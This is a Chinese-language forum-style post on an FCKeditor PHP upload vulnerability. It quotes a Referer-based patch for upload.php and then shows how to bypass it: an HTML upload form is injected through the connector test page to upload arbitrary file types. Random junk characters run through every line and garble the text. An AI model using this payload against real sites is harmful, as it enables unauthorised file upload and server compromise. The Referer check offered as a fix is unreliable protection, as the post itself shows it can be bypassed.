漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
: G8 b/ K0 |0 A; N6 |9 r0 g网上给出的修复方案是
5 K4 G: W3 k6 I6 y# A) h3 R修复方法,删除FCK编辑器用其他的编辑器
3 Q, M. v( y% |/ J) n& Y" A. }或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件4 x# l2 N1 r. `
在0 I( z Y2 P5 w0 ~4 E5 ?
require(‘config.php’);
# |% S- Z# A! ^" l# n, xrequire(‘util.php’);0 M1 l d) k+ M( W9 b& Y
的下面添加以下代码—————————–
! S# {1 x5 Q/ ~- J. r& J//防止外部提交
1 }2 O2 g7 ]8 h: A" p @. j) Wfunction outsidepost()
7 |$ O6 j, t" j{
1 b: b" Y. F+ c' y$servername=$_SERVER['SERVER_NAME'];
. I6 q1 f* W% z! F$sub_from=@$_SERVER['HTTP_REFERER'];( f; ^9 Q$ O+ {" X
$sub_len=strlen($servername);6 x- {) k- y8 |# i$ l* j) N& {: |+ C* M
$checkfrom=substr($sub_from,7,$sub_len);
$ v% d4 ^; l! ~! ?7 ]if($checkfrom!=$servername){
+ B7 w+ Q/ l& l' ]& h; }# z2 A9 oecho(“you don’t outsidepost!”);
. F8 O6 j1 E! |9 u3 u+ q9 b3 Wexit;8 t+ B1 |% V0 ^( \, j: H
}
0 d0 V! @# v. k3 `4 b$ u: J6 T}
' J" a* P' R1 p8 ?: u/ D5 Joutsidepost();
( m$ z7 U% J. O, B$ V防止外部提交,但是没有防止内部提交,9 ]2 x2 e, f& q# l
利用方法:8 @5 T$ V- G7 ~9 P' C: z
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
: m1 X# h8 U9 y i2,在Current Folder 框输入
; H2 i$ N& \* _' Q; Z<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>0 |' w0 J( }# I
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
+ h p i4 Q& nPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |